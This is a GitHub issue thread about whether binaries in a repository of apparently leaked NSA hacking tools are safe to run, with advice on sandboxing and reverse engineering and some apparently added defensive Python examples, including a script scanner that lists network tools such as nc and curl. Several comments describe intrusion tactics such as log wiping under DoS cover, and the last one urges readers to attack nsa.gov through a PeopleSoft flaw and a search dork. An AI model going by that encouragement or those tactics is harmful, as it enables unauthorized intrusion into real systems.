Danger-free? #10

Closed
Dawnspire3000 opened this issue Apr 9, 2017 · 76 comments

Comments

@Dawnspire3000

My Antivirus keeps putting certain binaries into quarantine. Does anyone use all the binaries? Are they really safe? I mean, this is legit but would that stop dangerous files from being in there?

@ghost

ghost commented Apr 9, 2017

Nothing in here is "danger free". If you are going to execute random binaries you downloaded from a random GitHub repository, you are going to be in a world of pain.

@Dawnspire3000 (author)

Well, that's true, but again, this appears to not just be some random repository. I just wanted to know if anyone had bad experiences with them or if it's working fine.

@peterpt

peterpt commented Apr 9, 2017

Some of the binaries are probably meant to be planted on the victim system and are not exploits.
This means that those binaries already have a backdoor implemented.

Otherwise it makes no sense for antivirus to pop up warnings on these files if they are only exploits.

Some of these tools are data retrieval tools; this means that the victim machine was already prepared beforehand with the backdoor binaries.

A quick look into the shell script code gives you an idea of what the tool does.
Some tools target specific directories on victim machines.

Running the binaries is not advised if you do not want your system compromised.
Do not trust code that you cannot read.

@ghost

ghost commented Apr 9, 2017

Oh dear.

@Ekultek

Ekultek commented Apr 9, 2017

You should reverse engineer the binaries first before you execute them.

@Dawnspire3000 (author)

Good idea, I'll work on it

@Tbone-grady

Tbone-grady commented Apr 9, 2017

As @Ekultek said, reverse engineering is a good idea; as peterpt mentioned about executing random binaries on your machine, TAO standard procedure states they use a staging server to assess their tools' integrity and whether or not they need further development. I use an old Linux laptop to assess and identify their functions.

I invested in Danderspritz; specific binaries use an LP (Listening Post) to connect to implants. The NSA TAO branch seems to operate like the military and I do suppose it is directly tied to US Cyber Command. I went through the TAO SOP and to run any operations they have MIT install most of the prerequisites. A Solaris/Windows Server 2008 standalone OS for FA servers. But I theorize they mainly use either Solaris or Apache, according to the leak during August last year.

@Ekultek

Ekultek commented Apr 9, 2017

What you should really do if you don't want to take the time to reverse engineer is sandbox a virtual machine and run each one, make a custom app that will record all the differences made from start to finish, and then figure out what each one does from there.

However, what @tdog21 said is a brilliant idea, but if you're just looking to get them to run, sandbox it, run each one and discover the backtrace of what each one does.
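One way to implement the "record all the differences made from start to finish" step described above, as an added example that is not part of the original thread or of the EQGRP repository: snapshot every regular file under the sandbox root before and after the run (relative path, size, SHA-256) and diff the two snapshots. The directory layout and the file changes in `demo()` are constructed for the example; in practice you would point `snapshot()` at the guest's mounted disk or run it inside the VM, and you would still rely on the VM snapshot, not this script, for rollback.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (relative POSIX path) to (size, sha256).

    Symlinks are skipped so that a planted link cannot make us hash files
    outside the sandbox tree.
    """
    root = Path(root)
    state = {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        state[rel] = (len(data), hashlib.sha256(data).hexdigest())
    return state


def diff_snapshots(before, after):
    """Return sorted lists of paths that were added, removed or changed content."""
    before_keys, after_keys = set(before), set(after)
    return {
        "added": sorted(after_keys - before_keys),
        "removed": sorted(before_keys - after_keys),
        "modified": sorted(p for p in before_keys & after_keys if before[p] != after[p]),
    }


def demo():
    """Constructed example: a fake sandbox tree and a 'sample' that changes it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "tmp").mkdir()
        (root / "tmp" / "scratch").write_text("old\n")
        before = snapshot(root)

        # --- the untrusted binary would run here; we simulate its side effects ---
        (root / "etc" / "passwd").write_text(
            "root:x:0:0:root:/root:/bin/sh\nsvc:x:0:0::/:/bin/sh\n"  # second uid-0 user
        )
        (root / "tmp" / "scratch").unlink()  # it cleaned up its own scratch file
        (root / "tmp" / ".cache").mkdir()
        (root / "tmp" / ".cache" / "lib.so").write_bytes(b"\x7fELF" + b"\x00" * 12)  # dropped payload

        return diff_snapshots(before, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

Only content changes show up as "modified": a tool that touches timestamps or permissions without rewriting bytes is invisible here, so pair this with the VM's own process and network capture rather than treating the diff as the whole picture.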

@Tbone-grady

Tbone-grady commented Apr 9, 2017

@Ekultek The only issue is that virtual boxes tend to be harder to work with due to their high memory usage and unreliability, and Advanced Persistent Threats can target the box. But I see your point. Watch the Cisco SIO: Defence in Depth talk on YouTube. It involves the castle approach and talks about threat evolution.

@Ekultek

Ekultek commented Apr 9, 2017

@tdog21 you are correct, but at the same time, you can always get rid of a VM, and it's easier to do so than to completely reformat your hard drive. And with a sandbox around it, nothing will get out, unless, as you said, it's extremely advanced. Which in this case, most of them don't look too advanced.

@Tbone-grady

@Ekultek good point, although I never mentioned it's extremely advanced; for me, doing it on a different machine allows me to listen to the machine's ports and see what's going on. Plus I do have a slow internet connection where I live, so deleting a VM with up-to-date drivers and software isn't an option for me.

@Ekultek

Ekultek commented Apr 9, 2017

Fair enough. Either way, most of these scripts don't even work. I think we're missing something from them, to be honest. Either way, none of this was made by the NSA lol

@Tbone-grady

Tbone-grady commented Apr 9, 2017

@Ekultek I might be able to provide insight into this question; I'm planning on a summer internship with their cyber division.

@Ekultek

Ekultek commented Apr 9, 2017

@tdog21 which question would that be? And how did you manage to land that internship?

@peterpt

peterpt commented Apr 9, 2017

Most tools do a call to jl.command which executes the compiled binary connect.so.

So, reversing connect.so to the original source code will give you an idea of how the exploit works, or even if it is an exploit.

If you all look inside this example script:
https://github.com/x0rz/EQGRP/blob/master/archive_files/bin/decftp.sh

at the end of the script jl.command executes that binary on a supposed port 10402.
Basically, from what I can see, this tool will retrieve the file pmgrd.Z from a specific server after jl.command is executed.
And if you still look closely at the script, you will see that you already have to know the base directory where this tool will get that data.

The data will be in a hidden directory inside your base directory that you must specify when executing the script.
Line 26 shows the location of the hidden directory inside your base directory;
line 32 starts ftp and in line 36 the file is picked up from the server.

I have not had much time yet to look into these tools more carefully, but you all should be careful using any tool inside the bin directory, because all of them make an execution call to jl.command, which uses a pre-compiled binary with extension .so which we know nothing about.
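A static triage pass of the kind peterpt describes (reading the shell script for which helper it execs, which port it names, which hidden directory it writes to and which file it fetches) can be automated before anything is run. The following is an added example, not code from the thread or from the EQGRP repository. The script it scans is a constructed stand-in that mimics the pattern described above and is not the leaked decftp.sh; the strings jl.command, connect.so, 10402 and pmgrd.Z appear only because the comment above mentions them, and the 192.0.2.10 address is a documentation address chosen for the example.

```python
import re

# Commands whose presence means the script talks to the network.
NET_TOOLS = {"ftp", "tftp", "nc", "ncat", "telnet", "wget", "curl", "ssh", "scp", "rsh"}
# "$BASEDIR/.store", "/var/tmp/.x": a path component that starts with a dot.
HIDDEN_PATH_RE = re.compile(r"[\w$/{}]*?/\.[\w.-]+")
# ftp/tftp batch lines of the form "get <file>" / "mget <file>".
FTP_GET_RE = re.compile(r"^(?:m?get)\s+(\S+)")


def triage_script(text):
    """Scan shell script text for the things worth knowing before running it.

    Returns a dict with: lines that invoke the jl.command helper, numeric ports
    on those lines, hidden paths, lines that start a network client, and files
    fetched in an ftp-style batch. Comments are stripped naively (a '#' inside
    a quoted string also cuts the line), which is acceptable for triage.
    """
    found = {"helpers": [], "ports": [], "hidden_paths": [], "net_tools": [], "fetched": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        if "jl.command" in line:
            found["helpers"].append(line)
            found["ports"].extend(int(t) for t in tokens if t.isdigit() and 1 <= int(t) <= 65535)
        found["hidden_paths"].extend(HIDDEN_PATH_RE.findall(line))
        if tokens[0] in NET_TOOLS:
            found["net_tools"].append(line)
        m = FTP_GET_RE.match(line)
        if m:
            found["fetched"].append(m.group(1))
    return found


# Constructed stand-in script for the example; NOT the leaked decftp.sh.
SAMPLE_SCRIPT = r"""#!/bin/sh
# usage: sample.sh <basedir>
BASEDIR=$1
HIDDEN="$BASEDIR/.store"
mkdir -p "$HIDDEN"
./jl.command ./connect.so 10402
cd "$HIDDEN"
ftp -n 192.0.2.10 <<EOF
user anonymous x
binary
get pmgrd.Z
quit
EOF
"""


def summarize(found):
    """One-line verdict for a human reviewer."""
    return (f"{len(found['helpers'])} helper exec(s), ports {found['ports']}, "
            f"hidden paths {found['hidden_paths']}, net {len(found['net_tools'])} line(s), "
            f"fetches {found['fetched']}")


if __name__ == "__main__":
    print(summarize(triage_script(SAMPLE_SCRIPT)))
```

Run it over every file in the bin directory and sort by the number of findings: scripts that both exec an opaque .so and open a network client are the ones to reverse first, and the port numbers it extracts are what you would expect to see on the wire in the sandbox capture.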

@Tbone-grady

@Ekultek I didn't "land it" yet; I looked at their career and internship programs and I'm still deciding and

@Ekultek

Ekultek commented Apr 9, 2017

@tdog21 what's there to decide man? That's an awesome opportunity, take it with both hands or someone else will bro! Imagine how much you already know, and then imagine what you could learn.

@Tbone-grady

@Ekultek Good point I might as well apply

@Tbone-grady

@peterpt good point, and yes, the NSA have their own file extensions for their CNE/CNA branch.

@peterpt

peterpt commented Apr 9, 2017

My guess about all these tools is that they should be executed inside the victim machine and not from outside.

This way it makes sense why they got them from a compromised system.
Otherwise they would have had to hack the NSA directly.

@Ekultek

Ekultek commented Apr 9, 2017

@peterpt either that or we're missing a distro server or something; executing these inside a machine doesn't really make sense, you would need to know the exact layout of their machine in order to work efficiently. However, if you executed it from a server, then these might just be the tools to exploit the Cisco servers that got patched.

@Ekultek

Ekultek commented Apr 9, 2017

So my guess is, these are either bullshit and they threw them together to scare someone, or we're missing something. However, Snowden himself did say something about these, and we can't discredit Snowden just yet (even though he's very unreliable).

@peterpt

peterpt commented Apr 9, 2017

Ekultek, there could be mixed stuff.
We will know in the next weeks.
When I get some time here I will look more closely; in the meantime I believe that a new batch of files will be updated. Maybe some cool stuff comes along in the next batch of files.

@Ekultek

Ekultek commented Apr 9, 2017

I say fuck it guys. @peterpt @tdog21 let's hack the NSA, give them a taste of their own medicine.

@peterpt

peterpt commented Apr 9, 2017

Hacking the NSA exploit repository would be the same thing as winning the lottery.
Unless you worked there and you have a backdoor login, it will be a very difficult job to hack them.
Most of what can be achieved against the NSA is a DDoS, but that will take you nowhere.

Anyway, if you give a job to 2 persons where each person must do it individually, then you will get different results.
This means that many of the released 0day exploits on exploit-db, the NSA did not know about them; they probably have a different approach to a specific program which uses a different exploit technique.
The difference between both is that 0day exploits on exploit-db are patched by software companies, while the NSA ones are not patched because software companies do not know yet about that vulnerability.
This way it gives the NSA a very big leverage.
However, if you look into GitHub code you will see that many people create code to violate other persons' privacy, while others on GitHub build code to protect those persons.
Only this way I believe things can evolve in programming.

@Ekultek

Ekultek commented Apr 9, 2017

@peterpt well, I work for the government, I can tell you this much: they are really big on keeping things secure and really like to find what's wrong with everyone else, but when they do find it, they don't really fix it for themselves. Example: all those Cisco switches, they may have patched it for everyone else, but did they patch it for their government that didn't tell them about the exploits in the first place? They are under no legal binding contract to not patch them for the NSA. Just because something seems impossible doesn't mean it is. A 12-year-old got 400k from Google for finding an exploit once.

@peterpt

peterpt commented Apr 9, 2017

See it this way.
Got an open port? If you have an exploit for the service running on that port then you can get in and do whatever you want, otherwise forget it.
Usually hacking on the fly is done by SQL injection points on some webserver, but by default the good stuff is not on the same subnet as the webserver.
Without even mentioning that you have to route your connection through multiple proxies to not be detected, which these days is not difficult to bypass to get your real public IP address.
However, I believe that this subject should not be discussed here on GitHub, but just to finish the comment, a good sysadmin never uses the original firmware of his router, firewall or switch; open source firmwares are the best solution in every perspective.
Again, by default governments always use original firmwares on their network hardware, which makes things easier to hack.
Most sophisticated attacks on networks are made by multiple people at the same time, where 2 or 3 are doing the job to get in while the other 17 are sending controlled DoS attacks or testing the website just to fill up the firewall log so the work of those 3 cannot be detected easily in real time.
After those 3, or 1 of them, get in, the first thing they do is clear the log file on the firewall or server so the sysadmin has no idea how they got inside, and then after their job is done on the victim, they clean the log again.
When the sysadmin takes a look into the server or firewall logs, he will not find anything, and at the same time he was hacked.
Hackers using this technique will do it the same way next time as they did before, because the vulnerability they found was not patched, since the sysadmin has no idea how they did it.
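The log-clearing step described above only works if the defender has no way to tell that entries were removed. As an added example that is not part of the thread, here is the counter-measure a practitioner would want: write each log record with a SHA-256 over the previous record's hash, and ship the latest hash to a collector the attacker cannot reach. Deleting or editing an entry then breaks the chain, and chopping the tail off is caught by comparing against the shipped head hash. The firewall lines in `demo()` are constructed, and the remote collector is simulated by a local variable.

```python
import hashlib
import json

GENESIS = "0" * 64  # hash value assumed for "the record before the first one"


def _entry_hash(prev_hash, record):
    """SHA-256 over the previous hash and a canonical JSON encoding of the record."""
    payload = prev_hash.encode() + b"\n" + json.dumps(record, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()


def append_record(chain, record):
    """Append a record to the chain (a list of dicts) and return the new entry."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    entry = {"record": record, "prev": prev_hash, "hash": _entry_hash(prev_hash, record)}
    chain.append(entry)
    return entry


def verify_chain(chain, expected_head=None):
    """Return None if the chain is intact, else the index of the first bad entry.

    expected_head is the last hash as shipped to a remote collector. Without it
    a truncated tail cannot be detected, which is exactly why the head hash has
    to leave the box.
    """
    prev_hash = GENESIS
    for i, entry in enumerate(chain):
        if entry["prev"] != prev_hash or entry["hash"] != _entry_hash(prev_hash, entry["record"]):
            return i
        prev_hash = entry["hash"]
    if expected_head is not None and prev_hash != expected_head:
        return len(chain)  # entries missing from the end
    return None


def demo():
    """Constructed firewall lines; shows what each kind of tampering looks like."""
    lines = [
        "2017-04-09T10:00:01 DENY  tcp 203.0.113.5:51000 -> 192.0.2.10:22",
        "2017-04-09T10:00:02 DENY  tcp 203.0.113.5:51001 -> 192.0.2.10:22",
        "2017-04-09T10:00:03 ALLOW tcp 198.51.100.7:40000 -> 192.0.2.10:443",
        "2017-04-09T10:00:04 ALLOW tcp 198.51.100.7:40001 -> 192.0.2.10:22",
        "2017-04-09T10:00:05 DENY  udp 203.0.113.9:53 -> 192.0.2.10:53",
    ]
    chain = []
    for line in lines:
        append_record(chain, {"line": line})
    shipped_head = chain[-1]["hash"]  # stands in for the hash sent to the collector

    results = {"intact": verify_chain(chain, shipped_head)}
    # attacker deletes the entry that shows their successful connection
    results["middle_removed"] = verify_chain(chain[:2] + chain[3:], shipped_head)
    # attacker rewrites an entry in place
    edited = [dict(e) for e in chain]
    edited[3]["record"] = {"line": edited[3]["record"]["line"].replace("ALLOW", "DENY ")}
    results["edited"] = verify_chain(edited, shipped_head)
    # attacker truncates the file after their activity
    results["tail_removed"] = verify_chain(chain[:3], shipped_head)
    # same truncation, but nobody shipped the head hash: goes unnoticed
    results["tail_removed_no_head"] = verify_chain(chain[:3])
    return results


if __name__ == "__main__":
    for case, bad_index in demo().items():
        verdict = "ok" if bad_index is None else "broken at entry %d" % bad_index
        print("%-21s -> %s" % (case, verdict))
```

The chain itself is cheap; what matters operationally is the last case. An attacker with root can rewrite the whole chain consistently from the start, so the defence is the copy of the head hash (or of the records themselves) held somewhere root on the compromised box cannot write to.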

@Tbone-grady

Tbone-grady commented Apr 9, 2017

@peterpt and your point is...

@Far00K

Far00K commented Apr 9, 2017

But if you want to hack the NSA you must find the vulnerability they found. If that was what you wanted? And if you want to clean the log you need admin, and that can take a while, and in the time you are trying to get root access they will already see the log.

You need to get root access very fast... maybe do some reconnaissance/footprinting and see how often they look at their system to see how much time you have.

Or you hack them without doing anything strange that makes the sysadmin react and see it.

@Ekultek

Ekultek commented Apr 9, 2017 via email

@marctmiller

marctmiller commented Apr 9, 2017 via email

@Tbone-grady

@Far00K and @marctmiller, zip this horseshit, it's getting irritating. Go create a new thread and talk about it in there.

@marctmiller

marctmiller commented Apr 9, 2017 via email

@Ekultek

Ekultek commented Apr 9, 2017

@marctmiller let's break this down logically really quick. What do we know (or think we know)?

  1. A hacking group's claim to fame is that they hacked an NSA archive containing a bunch of "hacking tools" that don't really do anything.
  2. These tools clearly have a version control system in place, or else there would not be a version number in the code.
  3. These "tools" apparently were dumped in reply to Trump bombing Syria; however, that doesn't make logical sense: if you wanted to let Trump know you are pissed, just dump his information instead.
  4. We (think) we are missing something from these because most of the tools direct to either a certain IP address, or require a certain server name; if you run them, most of them require an IP to be initialized.
  5. If this REALLY was from the NSA and was IMPORTANT to them, it would have been shut down hours ago, and we would all be being tracked for even being on here because we all made forks of it.

So what this boils down to is this: the NSA either didn't write this, or we don't have all the files.

Now seeing how you're a complete tool who doesn't care what his GitHub looks like, with his 6 stars and lack of git pushes, let me break it down even further for your feeble mind. The intellectual conversation we are having about the system is that we don't have all the information. I understand this can be hard to follow because you write JS, so let me explain: this_code != NSA_WORK (logically) because of the aforementioned circumstances. So what we are trying to figure out is what this is, and why it's here. Yes, it can be whatever we want it to be, like the fucking moon could be made of cheese, but it's not. So if you're gonna come here and try to put someone down for having a response and a question, please just go away, thanks.

@Far00K

Far00K commented Apr 9, 2017

No, I didn't mean to irritate you. I just got triggered by marctmiller.

@Far00K

Far00K commented Apr 9, 2017

I have an idea. We must remember that we are talking about the NSA, and if these were their files and they were so important, they could just shut down GitHub or the sources that are leaking the files out.

@marctmiller

marctmiller commented Apr 9, 2017 via email

@Far00K

Far00K commented Apr 9, 2017

ok...

@Tbone-grady

@Far00K don't worry, @marctmiller is just insecure and is trying to assert himself.

@Far00K

Far00K commented Apr 9, 2017

Burned

@Ekultek

Ekultek commented Apr 9, 2017

@Far00K or he's just extremely dumb. It's one or the other lol.

Anyways @tdog21 I still think we're missing some files. There's gotta be a configuration or something we don't have.

@Far00K

Far00K commented Apr 9, 2017

I think, why should they give all the files? Maybe it was just a show-off to show they have the files, and later they're going to ask for money for the rest.

@marctmiller

marctmiller commented Apr 9, 2017 via email

@Far00K

Far00K commented Apr 9, 2017

But what do you know that we don't already know? (sorry for my English)

@Ekultek

Ekultek commented Apr 9, 2017 via email

@Far00K

Far00K commented Apr 9, 2017

ok... I meant the question for marctmiller

@Far00K

Far00K commented Apr 9, 2017

And what do you mean you get paid to do this @Ekultek

@Ekultek

Ekultek commented Apr 10, 2017

@marctmiller nobody said anything about not being able to run them. They just don't really do anything when you do run them.

@marctmiller

marctmiller commented Apr 10, 2017 via email

@NoahGWood

@Ekultek
The NSA would have no legal right to "track you down" and van you for forking this GitHub repo or scouring the source. If you do not hold a security clearance you are not prohibited from viewing classified/secret/top-secret/xyasdf information that was released publicly, even if the information is still classified and the people who released it did so illegally.

If you DO hold a security clearance on the other hand, you could get in trouble for viewing these files.

Also, I wouldn't say they don't do anything. There are exploits, all manner of rootkits, and more binaries than a single person could pore through in a week. The fact that a few Python scripts require connecting back to other servers is irrelevant. The exploits are still there and still able to be reverse engineered.

@Ekultek

Ekultek commented Apr 10, 2017 via email

@Far00K

Far00K commented Apr 10, 2017

I looked into a file and one of them had an instruction

@Far00K

Far00K commented Apr 10, 2017

It can mean that it's an instruction to hack something

@ghost

ghost commented Apr 10, 2017

Thanks for filling up my mailbox with your edgy comments 👍

@Far00K

Far00K commented Apr 10, 2017

De nada

@pussyknit

Are you guys kidding me with this shit? Of course there are different versions. The NSA keeps a retarded index of hardware profiles with workarounds and exploits for each type of hardware profile. Shit, this stuff is fucking played out like acid wash. This thread was a yawn fest. You guys should try taking drugs or get some HOOKERS and loosen up. This shit is real but these versions are not the latest. This is old shit. BTW fuck working for those commie fucks. They wouldn't hire anyone from this thread. You ladies would never make the cut. These clowns only pull internet consortium, Ivy League motherfuckers that are robots with a spotless history. You chronic masturbators need to stay in school. Maybe in about forty years you can get a job at the NSA pushing a broom. Fuck the pigs. America is burnt

@Atavic

Atavic commented Jul 19, 2017

@Dawnspire3000 Just close this trollfest of an issue, please.

@Atavic

Atavic commented Jul 19, 2017

Thank you.

@ghost

ghost commented Jul 23, 2017

If you want to hack the NSA, best bet is start here:

NSA dotgov exposes their Oracle Peoplesoft login ~ LOL

http://i.magaimg.net/img/10yu.png

As recently as May, you could have used this Peoplesoft RCE to pwn NSA dotgov ~ LOL

http://i.magaimg.net/img/10yt.png

Hint: Google site:nsa.gov inurl:psp

http://i.magaimg.net/img/10yv.png

I encourage you to poke around NSA dotgov, there's all kinds of little fuckups they ignored.
If your Autism can exceed the NSA's autism, you'll find something they put in that they didn't know that you could do.
More important than any exploits, I strongly encourage you to read their small mountain of pdfs of declassified historical documents covering every topic from Nerd-Heaven imaginable.
It doesn't matter which pdfs you read, nor which order, just pick anything you find personally interesting and start digging in.

Btw, you have my full permission to hack NSA dotgov anyway that you can find--if you're clever enough to slap the face of supreme hubris from jackasses who said "Nothing is Beyond Our Reach" then you deserve all the Street Fame for cuckshaming them.

Don't be intimidated by their $72 BILLION Black Budget and GODMODE. At least 97% of it is PURE WASTE, and those drooling mouth-breathing gubbmint GS-13s couldn't tell their asshole from a hole in the ground unless there was an Official Manual with a list of checkboxes for them to blindly obey how to do it.
Always remember the Federales can barely light up 2 neurons between themselves and that's by design.
Do you want a goddamn hyper efficient govt that could go Super-1984 in a snap of the fingers?
Hell no! Slapstick redundancy, gross incompetence, $600 Park outhouse toilet seats, $1000 claw hammers and "accidentally losing" $2.2 BILLION in Hummers to ISIS in Mosul is the only thing keeping us Free from a Cyber Dystopian Orwellian Nightmare!

Anyways, so I tweeted more about how to hack NSA:

http://i.magaimg.net/img/10yx.png

And more...

http://i.magaimg.net/img/10yz.png

And then ironically, within minutes of tweeting, I got suspended ~ LOL

http://i.magaimg.net/img/10z0.png

Which I take as a badge of honor btw. If I was deemed enough of a cyber threat to be targeted in real-time and shut_it_down_the_goyim_know.jpg just for fucking around with Google Dorking and poking NSA dotgov with a stick for fun during an idle 15 minutes, imagine the real exploitation that's possible if you properly case the joint and bring your full hamburgler tool kit?

Perhaps this little incident had something to do with a not very talkative FBI Special Agent calling me a month later and asking me if I knew anything about the Shadowbroker and a plot to re-purpose EQGRP viruses to crash the entire Internet just to hit glass jaw NSA on the chin.

(btw just in case jerks don't like my mean words here, does it look like i care if this throw away GH acct also gets suspended? Once you're marked as Enemy of the State like me, every acct you have gets suspended every week, which you Deal_With_It.gif and interpret your own censorship as damage and route around it.)

10 participants